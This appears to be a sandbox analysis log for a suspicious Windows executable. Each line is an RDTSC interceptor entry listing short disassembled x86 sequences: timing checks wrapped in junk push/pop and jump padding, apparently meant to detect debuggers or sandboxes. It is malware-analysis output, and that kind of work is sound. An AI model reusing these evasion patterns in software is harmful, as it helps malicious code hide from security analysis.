Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9EBAA second address: F9EBCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BEh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FB8E4E1E3C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9EBCA second address: F9EBCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9F042 second address: F9F048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9F2ED second address: F9F2F7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8E4E1A516h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9F2F7 second address: F9F310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB8E4E1E3BDh 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F9F497 second address: F9F4BC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB8E4E1A522h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB8E4E1A51Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FA1B3D second address: FA1B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FA1B41 second address: FA1B6F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB8E4E1A51Dh 0x00000011 jmp 00007FB8E4E1A525h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FA4CF2 second address: FA4CF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FA4CF8 second address: FA4CFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FA4CFC second address: FA4D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FA47CC second address: FA47D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FA4912 second address: FA491B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FA491B second address: FA4932 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A523h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FAA9A4 second address: FAA9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FAA9AA second address: FAA9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FAA9AF second address: FAA9FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FB8E4E1E3B6h 0x00000009 jmp 00007FB8E4E1E3C9h 0x0000000e popad 0x0000000f jmp 00007FB8E4E1E3C6h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jmp 00007FB8E4E1E3BEh 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FAA9FC second address: FAAA08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FB8E4E1A516h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FAAB47 second address: FAAB4C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FAACAD second address: FAACB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FAAE00 second address: FAAE11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 js 00007FB8E4E1E3B6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FAAE11 second address: FAAE2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FB8E4E1A524h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FAAF9A second address: FAAFB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jbe 00007FB8E4E1E3B6h 0x0000000d popad 0x0000000e push eax 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop eax 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FAAFB5 second address: FAAFD1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB8E4E1A51Fh 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4F5B5 second address: F4F5BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4F5BF second address: F4F62B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FB8E4E1A518h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov ebx, dword ptr [ebp+12478607h] 0x00000028 add edi, dword ptr [ebp+122D2A9Fh] 0x0000002e add eax, ebx 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007FB8E4E1A518h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 0000001Ch 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D3895h], eax 0x00000050 push eax 0x00000051 jo 00007FB8E4E1A524h 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FABC20 second address: FABC3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB8E4E1E3BDh 0x0000000b js 00007FB8E4E1E3C2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FABC3B second address: FABC50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB8E4E1A516h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FB8E4E1A518h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FABC50 second address: FABC6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8E4E1E3C4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FABC6A second address: FABC6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FABC6E second address: FABC72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FABC72 second address: FABC86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB8E4E1A516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FB8E4E1A522h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FABC86 second address: FABC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FAED98 second address: FAEDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB8E4E1A516h 0x0000000a jmp 00007FB8E4E1A524h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FAEDBA second address: FAEDC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FAE6B2 second address: FAE6C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FB8E4E1A516h 0x00000009 push edi 0x0000000a pop edi 0x0000000b jno 00007FB8E4E1A516h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB2003 second address: FB2013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB8E4E1E3BAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB9D23 second address: FB9D75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8E4E1A529h 0x00000008 jnc 00007FB8E4E1A516h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FB8E4E1A527h 0x00000017 jno 00007FB8E4E1A516h 0x0000001d jg 00007FB8E4E1A516h 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB9D75 second address: FB9D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB9D79 second address: FB9D8F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007FB8E4E1A516h 0x0000000d jnp 00007FB8E4E1A516h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB9D8F second address: FB9DA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8E4E1E3BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB7C29 second address: FB7C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB7C2F second address: FB7C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB7C35 second address: FB7C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB8E4E1A516h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB7F64 second address: FB7F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB7F68 second address: FB7F96 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8E4E1A52Dh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB8E4E1A525h 0x0000000f jbe 00007FB8E4E1A518h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB7F96 second address: FB7F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB886E second address: FB888A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1A526h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB888A second address: FB8892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4F92D second address: F4F931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB96E8 second address: FB96EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB96EE second address: FB971B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1A526h 0x00000009 popad 0x0000000a push ecx 0x0000000b jmp 00007FB8E4E1A520h 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB971B second address: FB9720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB9720 second address: FB9739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jg 00007FB8E4E1A51Ah 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB9739 second address: FB973F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FB973F second address: FB9744 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBFD56 second address: FBFD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBFD5B second address: FBFD72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8E4E1A523h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBFD72 second address: FBFD7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBFD7F second address: FBFD89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB8E4E1A516h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBEDB9 second address: FBEDC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBF093 second address: FBF0D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FB8E4E1A524h 0x0000000c popad 0x0000000d jnl 00007FB8E4E1A520h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB8E4E1A520h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBF0D7 second address: FBF0ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3C2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBF0ED second address: FBF0F3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBF405 second address: FBF40F instructions: 0x00000000 rdtsc 0x00000002 js 00007FB8E4E1E3BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBF40F second address: FBF42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FB8E4E1A523h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBF42F second address: FBF433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBF571 second address: FBF588 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A51Eh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBF705 second address: FBF709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBF709 second address: FBF72A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB8E4E1A516h 0x00000008 jmp 00007FB8E4E1A527h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBF72A second address: FBF735 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FB8E4E1E3B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBF735 second address: FBF73B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBF73B second address: FBF74E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB8E4E1E3B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FB8E4E1E3B6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBF74E second address: FBF79C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A51Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jns 00007FB8E4E1A539h 0x00000012 pushad 0x00000013 jmp 00007FB8E4E1A51Fh 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBFA59 second address: FBFA5E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBFA5E second address: FBFA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB8E4E1A526h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBFA7B second address: FBFAAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BDh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB8E4E1E3C6h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBFAAC second address: FBFABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A51Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FBFABE second address: FBFAC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FC46CB second address: FC46E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FC46E8 second address: FC46EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCBAE0 second address: FCBB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 jno 00007FB8E4E1A516h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 jmp 00007FB8E4E1A524h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCBB07 second address: FCBB11 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8E4E1E3B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCBFBB second address: FCBFD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB8E4E1A51Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f je 00007FB8E4E1A516h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCBFD9 second address: FCC01F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB8E4E1E3BBh 0x0000000b popad 0x0000000c jng 00007FB8E4E1E41Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB8E4E1E3C9h 0x00000019 jmp 00007FB8E4E1E3C3h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCC1B8 second address: FCC1D0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FB8E4E1A51Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: FCC1D0 second address: FCC1DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FB8E4E1E3B6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
